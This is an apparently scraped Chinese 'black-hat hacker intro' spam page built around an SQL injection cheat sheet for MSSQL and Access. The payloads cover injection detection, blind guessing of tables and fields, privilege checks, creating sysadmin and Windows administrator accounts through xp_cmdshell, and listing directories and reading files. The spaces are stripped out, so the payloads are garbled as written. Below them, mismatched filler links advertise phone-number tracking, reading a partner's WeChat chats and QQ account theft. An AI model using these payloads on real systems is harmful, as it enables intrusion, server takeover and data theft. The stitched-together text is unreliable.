黑客大户的联系方式-黑帽黑客入门(如何成为黑客 基础入门
1.判断是否有注入
;and1=1
;and1=2
2.初步判断是否是mssql
;anduser>0
3.注入参数是字符
'and[查询条件]and''='
4.搜索时没过滤参数的
'and[查询条件]and'%25'='
5.判断数据库系统
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access
6.猜数据库
;and(SelectCount(*)from[数据库名])>0
7.猜字段
;and(SelectCount(字段名)from数据库名)>0
8.猜字段中记录长度
;and(selecttop1len(字段名)from数据库名)>0
9.(1)猜字段的ascii值(access)
;and(selecttop1asc(mid(字段名,1,1))from数据库名)>0
(2)猜字段的ascii值(mssql)
;and(selecttop1unicode(substring(字段名,1,1))from数据库名)>0
10.测试权限结构(mssql)
;and1=(SelectIS_SRVROLEMEMBER('sysadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('serveradmin'));--
;and1=(SelectIS_SRVROLEMEMBER('setupadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('securityadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('diskadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('bulkadmin'));--
;and1=(SelectIS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--
;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--
12.(1)遍历目录
;createtabledirs(pathsvarchar(100),idint)
;insertdirsexecmaster.dbo.xp_dirtree'c:\'
;and(selecttop1pathsfromdirs)>0
;and(selecttop1pathsfromdirswherepathsnotin('上步得到的paths'))>)
(2)遍历目录
;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
;inserttempexecmaster.dbo.xp_availablemedia;--获得当前所有驱动器
;insertintotemp(id)execmaster.dbo.xp_subdirs'c:\';--获得子目录列表
;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:\';--获得所有子目录的目录树结构
;insertintotemp(id)execmaster.dbo.xp_cmdshell'typec:\web\index.asp';--查看文件的内容
相关文章
微信怎么养号不容易被封?
其实无论是养抖音的号也好养这些微信的行业号也好,最关键的原因就在于让所有的找号模拟成真实用户。一般来说需要的,然后就是15天左右,这样就可以让号源基本稳定下来。 首先我们在注册好微信号之后,先把基...
王者荣耀五虎上将皮肤怎么获得 五虎上将皮肤免费领活动地址
王者荣耀黄忠烈魂新皮肤已经在5月8日0零点上线了,黄忠终于是正式脱离了没有皮肤英雄队伍了,这款皮肤特效相当的拉风,各位玩家应该会喜欢!到目前已经有两款五虎将皮肤了,另外三款应该也会在近期上线,虽然皮肤...
只需手机号码定位跟踪(手机号码定位寻人系统)
可以的,定只能是大概位置,有一定误差,找人办法很多 根据您的描述,建议您按照以下方式操作:(注:使用以下功能手机需开启数据功能)1.注册三星账户:在手机端进入设定-安全-远程控制-添加账户-创建新。...
查询女朋友的微信聊天记录
蜜牙贝贝补钙软胶囊好用吗,蜜牙贝贝补钙软胶囊给宝宝补钙有效吗,蜜牙贝贝补钙软胶囊是一款专门给孩子补钙的液体钙胶囊。那么蜜牙贝贝补钙软胶囊好用吗,一起和友谊长存小编来来来试用测评。 宝贝整体 钙滴剂...
据称谷歌正与Hulu进行收购谈判
[世华财讯]据知情人人员表露,百度搜索引擎大佬Google已经与在线视频网站Hulu就回收后面一种开展基本交涉。Hulu还已与yahoo和微软公司等好几家潜在性收购者开展了交涉。 综合性新闻媒体...
怎么找黑客买软件(黑客盗号软件)
我前天刚从书店买了一本电脑报的《黑客攻防大师》第二版里面介绍QQ盗号的都过时了,我看了别的黑客书也一样也就入侵还可以我建议你如果想学入。 不同的软件攻击的内容和方式也是不一样的,不知道你是要哪方面的...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!